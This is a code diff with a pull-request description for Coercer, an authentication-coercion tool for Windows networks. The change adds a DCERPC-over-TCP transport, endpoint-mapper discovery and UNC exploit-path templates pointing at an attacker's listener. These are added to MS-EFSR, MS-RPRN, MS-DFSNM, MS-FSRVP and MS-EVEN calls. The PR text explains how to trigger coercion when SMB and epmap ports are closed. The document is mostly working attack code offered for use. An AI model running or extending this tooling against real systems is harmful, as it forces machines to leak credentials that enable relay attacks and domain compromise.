+                                    if instance not in tasks[access_type][port][uuid][version]:
+                                        tasks[access_type][port][uuid][version].append(instance)
 
     # Executing tasks =======================================================================================================================
 
@@ -62,69 +83,137 @@ def action_scan(target, available_methods, options, credentials, reporter):
     # Processing ncan_np tasks
     if len(tasks.keys()) == 0:
         return None
-    ncan_np_tasks = tasks["ncan_np"]
-    for namedpipe in sorted(ncan_np_tasks.keys()):
-        if can_connect_to_pipe(target, namedpipe, credentials):
-            print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
-            for uuid in sorted(ncan_np_tasks[namedpipe].keys()):
-                for version in sorted(ncan_np_tasks[namedpipe][uuid].keys()):
-                    if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
-                        print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
-                        for msprotocol_class in sorted(ncan_np_tasks[namedpipe][uuid][version], key=lambda x:x.function["name"]):
+    if "dcerpc" in options.filter_transport_name:
+        ncacn_ip_tcp_tasks = tasks.get("ncacn_ip_tcp", {})
+        for port in sorted(ncacn_ip_tcp_tasks.keys()):
+            if is_port_open(target, port):
+                print("[+] DCERPC port '\x1b[1;94m%d\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % port)
+                for uuid in sorted(ncacn_ip_tcp_tasks[port].keys()):
+                    for version in sorted(ncacn_ip_tcp_tasks[port][uuid].keys()):
+                        if can_bind_to_interface_on_port(target, port, credentials, uuid, version):
+                            print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
+                            for msprotocol_class in sorted(ncacn_ip_tcp_tasks[port][uuid][version], key=lambda x:x.function["name"]):
+                                
+                                exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+                                
+                                stop_exploiting_this_function = False
+                                for listener_type, exploitpath in exploit_paths:
+                                    if stop_exploiting_this_function == True:
+                                        # Got a nca_s_unk_if response, this function does not listen on the given interface
+                                        continue
+                                    if listener_type == "http":
+                                        http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
 
-                            exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+                                    exploitpath = generate_exploit_path_from_template(
+                                        template=exploitpath,
+                                        listener=listening_ip,
+                                        http_listen_port=options.http_port,
+                                        smb_listen_port=options.smb_port
+                                    )
 
-                            stop_exploiting_this_function = False
-                            for listener_type, exploitpath in exploit_paths:
-                                if stop_exploiting_this_function == True:
-                                    # Got a nca_s_unk_if response, this function does not listen on the given interface
-                                    continue
-                                if listener_type == "http":
-                                    http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
+                                    msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
+                                    dcerpc = DCERPCSession(credentials=credentials, verbose=True)
+                                    dcerpc.connect_ncacn_ip_tcp(target=target, port=port)
 
-                                exploitpath = generate_exploit_path_from_template(
-                                    template=exploitpath,
-                                    listener=listening_ip,
-                                    http_listen_port=options.http_port,
-                                    smb_listen_port=options.smb_port
-                                )
-
-                                msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
-                                dcerpc = DCERPCSession(credentials=credentials, verbose=True)
-                                dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)
-
-                                if dcerpc.session is not None:
-                                    dcerpc.bind(interface_uuid=uuid, interface_version=version)
                                     if dcerpc.session is not None:
-                                        reporter.print_testing(msprotocol_rpc_instance)
+                                        dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                        if dcerpc.session is not None:
+                                            reporter.print_testing(msprotocol_rpc_instance)
 
-                                        result = trigger_and_catch_authentication(
-                                            options=options,
-                                            dcerpc_session=dcerpc.session,
-                                            target=target,
-                                            method_trigger_function=msprotocol_rpc_instance.trigger,
-                                            listenertype=listener_type,
-                                            listen_ip=listening_ip,
-                                            http_port=http_listen_port
-                                        )
+                                            result = trigger_and_catch_authentication(
+                                                options=options,
+                                                dcerpc_session=dcerpc.session,
+                                                target=target,
+                                                method_trigger_function=msprotocol_rpc_instance.trigger,
+                                                listenertype=listener_type,
+                                                listen_ip=listening_ip,
+                                                http_port=http_listen_port
+                                            )
 
-                                        reporter.report_test_result(
-                                            uuid=uuid, version=version, namedpipe=namedpipe,
-                                            msprotocol_rpc_instance=msprotocol_rpc_instance,
-                                            result=result,
-                                            exploitpath=exploitpath
-                                        )
+                                            reporter.report_test_result(
+                                                uuid=uuid, version=version, namedpipe=namedpipe,
+                                                msprotocol_rpc_instance=msprotocol_rpc_instance,
+                                                result=result,
+                                                exploitpath=exploitpath
+                                            )
 
-                                        if result == TestResult.NCA_S_UNK_IF:
-                                            stop_exploiting_this_function = True
+                                            if result == TestResult.NCA_S_UNK_IF:
+                                                stop_exploiting_this_function = True
 
-                                if options.delay is not None:
-                                    # Sleep between attempts
-                                    time.sleep(options.delay)
-                    else:
-                        if options.verbose:
-                            print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
-        else:
-            if options.verbose:
-                print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)
+                                    if options.delay is not None:
+                                        # Sleep between attempts
+                                        time.sleep(options.delay)
+                        else:
+                            if options.verbose:
+                                print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
+            else:
+                if options.verbose:
+                    print("[!] DCERPC port '\x1b[1;94m%d\x1b[0m' is \x1b[1;91mclosed\x1b[0m!" % port)
+
+    if "msrpc" in options.filter_transport_name:
+        ncan_np_tasks = tasks["ncan_np"]
+        for namedpipe in sorted(ncan_np_tasks.keys()):
+            if can_connect_to_pipe(target, namedpipe, credentials):
+                print("[+] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;92maccessible\x1b[0m!" % namedpipe)
+                for uuid in sorted(ncan_np_tasks[namedpipe].keys()):
+                    for version in sorted(ncan_np_tasks[namedpipe][uuid].keys()):
+                        if can_bind_to_interface(target, namedpipe, credentials, uuid, version):
+                            print("   [+] Successful bind to interface (%s, %s)!" % (uuid, version))
+                            for msprotocol_class in sorted(ncan_np_tasks[namedpipe][uuid][version], key=lambda x:x.function["name"]):
+
+                                exploit_paths = msprotocol_class.generate_exploit_templates(desired_auth_type=options.auth_type)
+
+                                stop_exploiting_this_function = False
+                                for listener_type, exploitpath in exploit_paths:
+                                    if stop_exploiting_this_function == True:
+                                        # Got a nca_s_unk_if response, this function does not listen on the given interface
+                                        continue
+                                    if listener_type == "http":
+                                        http_listen_port = get_next_http_listener_port(current_value=http_listen_port, listen_ip=listening_ip, options=options)
+
+                                    exploitpath = generate_exploit_path_from_template(
+                                        template=exploitpath,
+                                        listener=listening_ip,
+                                        http_listen_port=options.http_port,
+                                        smb_listen_port=options.smb_port
+                                    )
+
+                                    msprotocol_rpc_instance = msprotocol_class(path=exploitpath)
+                                    dcerpc = DCERPCSession(credentials=credentials, verbose=True)
+                                    dcerpc.connect_ncacn_np(target=target, pipe=namedpipe)
+
+                                    if dcerpc.session is not None:
+                                        dcerpc.bind(interface_uuid=uuid, interface_version=version)
+                                        if dcerpc.session is not None:
+                                            reporter.print_testing(msprotocol_rpc_instance)
+
+                                            result = trigger_and_catch_authentication(
+                                                options=options,
+                                                dcerpc_session=dcerpc.session,
+                                                target=target,
+                                                method_trigger_function=msprotocol_rpc_instance.trigger,
+                                                listenertype=listener_type,
+                                                listen_ip=listening_ip,
+                                                http_port=http_listen_port
+                                            )
+
+                                            reporter.report_test_result(
+                                                uuid=uuid, version=version, namedpipe=namedpipe,
+                                                msprotocol_rpc_instance=msprotocol_rpc_instance,
+                                                result=result,
+                                                exploitpath=exploitpath
+                                            )
+
+                                            if result == TestResult.NCA_S_UNK_IF:
+                                                stop_exploiting_this_function = True
+
+                                    if options.delay is not None:
+                                        # Sleep between attempts
+                                        time.sleep(options.delay)
+                        else:
+                            if options.verbose:
+                                print("   [!] Cannot bind to interface (%s, %s)!" % (uuid, version))
+            else:
+                if options.verbose:
+                    print("[!] SMB named pipe '\x1b[1;94m%s\x1b[0m' is \x1b[1;91mnot accessible\x1b[0m!" % namedpipe)
 

--- a/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
+++ b/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
@@ -53,6 +53,12 @@ class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
                 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                 "version": "3.0"
             }
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
+                "version": "3.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
+++ b/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
@@ -52,6 +52,12 @@ class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
                 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                 "version": "3.0"
             }
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
+                "version": "3.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
@@ -89,6 +89,16 @@ class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
+++ b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
@@ -95,6 +95,16 @@ class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
+++ b/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
@@ -71,6 +71,16 @@ class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
@@ -82,6 +82,16 @@ class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
+++ b/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
@@ -70,6 +70,16 @@ class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
+++ b/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
@@ -71,6 +71,16 @@ class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
+++ b/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
@@ -71,6 +71,16 @@ class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
+++ b/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
@@ -70,6 +70,16 @@ class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
@@ -70,6 +70,16 @@ class EfsRpcQueryUsersOnFile(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
+++ b/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
@@ -91,6 +91,16 @@ class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
                 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                 "version": "1.0"
             },
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
+                "version": "1.0"
+            },
+            {
+                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
+                "version": "1.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_EVEN/ElfrOpenBELW.py
+++ b/coercer/methods/MS_EVEN/ElfrOpenBELW.py
@@ -31,6 +31,12 @@ class ElfrOpenBELW(MSPROTOCOLRPCCALL):
                 "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
                 "version": "0.0"
             }
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
+                "version": "0.0"
+            }
         ]
     }
 

--- a/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
+++ b/coercer/methods/MS_FSRVP/IsPathShadowCopied.py
@@ -35,10 +35,20 @@ class IsPathShadowCopied(MSPROTOCOLRPCCALL):
      - [@topotam77](https://twitter.com/topotam77)
     """
 
+    exploit_paths = [
+        ("smb", '\\\\{{listener}}\x00')
+    ]
+    
     access = {
         "ncan_np": [
             {
                 "namedpipe": r"\PIPE\Fssagentrpc",
+                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
+                "version": "1.0"
+            }
+        ],
+        "ncacn_ip_tcp": [
+            {
                 "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                 "version": "1.0"
             }

--- a/coercer/methods/MS_FSRVP/IsPathSupported.py
+++ b/coercer/methods/MS_FSRVP/IsPathSupported.py
@@ -35,10 +35,20 @@ class IsPathSupported(MSPROTOCOLRPCCALL):
      - [@topotam77](https://twitter.com/topotam77)
     """
 
+    exploit_paths = [
+        ("smb", '\\\\{{listener}}\x00')
+    ]
+    
     access = {
         "ncan_np": [
             {
                 "namedpipe": r"\PIPE\Fssagentrpc",
+                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
+                "version": "1.0"
+            }
+        ],
+        "ncacn_ip_tcp": [
+            {
                 "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
                 "version": "1.0"
             }

--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotification.py
@@ -18,11 +18,21 @@ class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
      -
     """
 
+    exploit_paths = [
+        ("smb", '\\\\{{listener}}\x00')
+    ]
+    
     access = {
         "ncan_np": [
             {
                 "namedpipe": r"\PIPE\spoolss",
                 "uuid": "12345678-1234-abcd-ef00-0123456789ab",
+                "version": "1.0"
+            }
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                 "version": "1.0"
             }
         ]

--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
@@ -18,11 +18,21 @@ class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
      -
     """
 
+    exploit_paths = [
+        ("smb", '\\\\{{listener}}\x00')
+    ]
+
     access = {
         "ncan_np": [
             {
                 "namedpipe": r"\PIPE\spoolss",
                 "uuid": "12345678-1234-abcd-ef00-0123456789ab",
+                "version": "1.0"
+            }
+        ],
+        "ncacn_ip_tcp": [
+            {
+                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                 "version": "1.0"
             }
         ]

--- a/coercer/network/DCERPCSession.py
+++ b/coercer/network/DCERPCSession.py
@@ -24,6 +24,29 @@ class DCERPCSession(object):
         self.__verbose = True
         self.credentials = credentials
 
+    def connect_ncacn_ip_tcp(self, target, port, targetIp=None, debug=False):
+        self.target = target
+        ncacn_ip_tcp = r'ncacn_ip_tcp:%s[%d]' % (target, port)
+        self.__rpctransport = transport.DCERPCTransportFactory(ncacn_ip_tcp)
+        self.session = self.__rpctransport.get_dce_rpc()
+        self.session.set_credentials(self.credentials.username, self.credentials.password, self.credentials.domain, self.credentials.lmhash, self.credentials.nthash, None)
+        self.session.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+        
+        if debug:
+            print("   [>] Connecting to %s ... " % ncan_target, end="")
+            sys.stdout.flush()
+        try:
+            self.session.connect()
+        except Exception as e:
+            if debug:
+                print("\x1b[1;91mfail\x1b[0m")
+                print("      [!] Something went wrong, check error status => %s" % str(e))
+            return None
+        else:
+            if debug:
+                print("\x1b[1;92msuccess\x1b[0m")
+        return self.session
+
     def connect_ncacn_np(self, target, pipe, targetIp=None, debug=False):
         """
 

--- a/coercer/network/rpc.py
+++ b/coercer/network/rpc.py
@@ -1,0 +1,114 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# File name          : rpc.py
+# Author             : soier (@s0i37)
+# Date created       : 13 Jul 2023
+
+
+import sys
+import socket
+from impacket.dcerpc.v5 import transport, epm
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+
+
+def portmap_discover(target, port=135):
+    stringBinding = r'ncacn_ip_tcp:%s[%d]' % (target, port)
+    rpctransport = transport.DCERPCTransportFactory(stringBinding)
+    dce = rpctransport.get_dce_rpc()
+    dce.connect()
+    entries = epm.hept_lookup(None, dce=dce)
+    endpoints = {}
+    ports = set()
+    for entry in entries:
+        binding = epm.PrintStringBinding(entry['tower']['Floors'])
+        uuid = str(entry['tower']['Floors'][0])
+        _transport,dst = binding.split(":")
+        try: endpoints[_transport]
+        except: endpoints[_transport] = {}
+        
+        try: endpoints[_transport][uuid]
+        except: endpoints[_transport][uuid] = set()
+        if _transport == "ncacn_np":
+            dst = dst.split("[")[1].split("]")[0]
+        elif _transport == "ncacn_ip_tcp":
+            dst = int(dst.split("[")[1].split("]")[0])
+            ports.add(dst)
+        elif _transport == "ncalrpc":
+            dst = dst[1:-1]
+        endpoints[_transport][uuid].add(dst)
+    print("[*] DCERPC portmapper discovered ports: %s" % ",".join(list(map(str, ports))))
+    return endpoints
+
+
+def is_port_open(target, port, verbose=False):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    if verbose:
+        print("         [>] Connecting to %s:%d ... " % (target, port), end="")
+    sys.stdout.flush()
+    try:
+        s.connect((socket.gethostbyname(target), int(port)))
+    except Exception as e:
+        if verbose:
+            print("\x1b[1;91mfail\x1b[0m")
+            print("      [!] Something went wrong, check error status => %s" % str(e))
+        s.close()
+        return None
+    else:
+        if verbose:
+            print("\x1b[1;92msuccess\x1b[0m")
+        s.close()
+        return True
+
+
+def can_bind_to_interface_on_port(target, port, credentials, uuid, version, verbose=False):
+    ncacn_target = r'ncacn_ip_tcp:%s[%d]' % (target, port)
+    rpctransport = transport.DCERPCTransportFactory(ncacn_target)
+    dce = rpctransport.get_dce_rpc()
+    dce.set_credentials(credentials.username, credentials.password, credentials.domain, credentials.lmhash, credentials.nthash, None)
+    dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+
+    if verbose:
+        print("         [>] Connecting to %s ... " % ncacn_target, end="")
+    sys.stdout.flush()
+    try:
+        dce.connect()
+    except Exception as e:
+        if verbose:
+            print("\x1b[1;91mfail\x1b[0m")
+            print("      [!] Something went wrong, check error status => %s" % str(e))
+        return False
+
+    if verbose:
+        print("         [>] Binding to <uuid='%s', version='%s'> ... " % (uuid, version), end="")
+    sys.stdout.flush()
+    try:
+        dce.bind(uuidtup_to_bin((uuid, version)))
+    except Exception as e:
+        if verbose:
+            print("\x1b[1;91mfail\x1b[0m")
+            print("         [!] Something went wrong, check error status => %s" % str(e))
+        if "STATUS_PIPE_DISCONNECTED" in str(e):
+            # SMB SessionError: STATUS_PIPE_DISCONNECTED()
+            return False
+        elif "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
+            # SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
+            return False
+        elif "STATUS_ACCESS_DENIED" in str(e):
+            # SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
+            return False
+        elif "abstract_syntax_not_supported" in str(e):
+            # Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint)
+            return False
+        elif "Unknown DCE RPC packet type received" in str(e):
+            # Unknown DCE RPC packet type received: 11
+            return False
+        elif "Authentication type not recognized" in str(e):
+            # DCERPC Runtime Error: code: 0x8 - Authentication type not recognized
+            return False
+        else:
+            return True
+    else:
+        if verbose:
+            print("\x1b[1;92msuccess\x1b[0m")
+        return True


### PR DESCRIPTION
## Coerce via DCERPC

Hello!
I have implemented the ability to coerce authentication through the DCERPC transport (https://github.com/p0dalirius/Coercer/issues/20)
For example, port 445/tcp (msrpc) is closed on the target:

![1](https://github.com/p0dalirius/Coercer/assets/22872513/24149360-b6a6-4889-92a8-bdbaccaa762c)

We can take from the endoint mapper (135/tcp) the location of the RPC functions we need. And then call them on the discovered DCERPC endpoints:

![2](https://github.com/p0dalirius/Coercer/assets/22872513/7781af38-2d0b-421f-b206-3c5b7fb9fe9d)

Let's assume that 445/tcp (msrpc) and 135/tcp (epmap) ports are closed on the target:

![3](https://github.com/p0dalirius/Coercer/assets/22872513/107e85be-5018-4948-9f97-5a9c375551c1)

In this case, we can find the approximate location of DCERPC endpoints and also call them directly:

![4](https://github.com/p0dalirius/Coercer/assets/22872513/d40e8375-c308-4490-b4af-457222d1311b)

If port 135/tcp is available to us, then through the endoint mapper we often cannot get a list of all interfaces.
For example, let's try to close access to the RPC printerbug on the target:

![5](https://github.com/p0dalirius/Coercer/assets/22872513/877fcb27-7991-40d7-9595-43f5173c6932)

In this case, we will not find anything:

![6](https://github.com/p0dalirius/Coercer/assets/22872513/7dd334b1-fd3e-4aa8-9185-1235591d6b7d)

However, we can call the RPC functions forcibly on each port, and this works:

![7](https://github.com/p0dalirius/Coercer/assets/22872513/b6d98692-56a9-4f92-9103-108ea17bd66b)

According to the Coercer architecture, things like this should automatically be checked in the fuzz module:

![8](https://github.com/p0dalirius/Coercer/assets/22872513/a3c03cf5-0fdd-4f78-92d5-682af4c97454)

Thank you!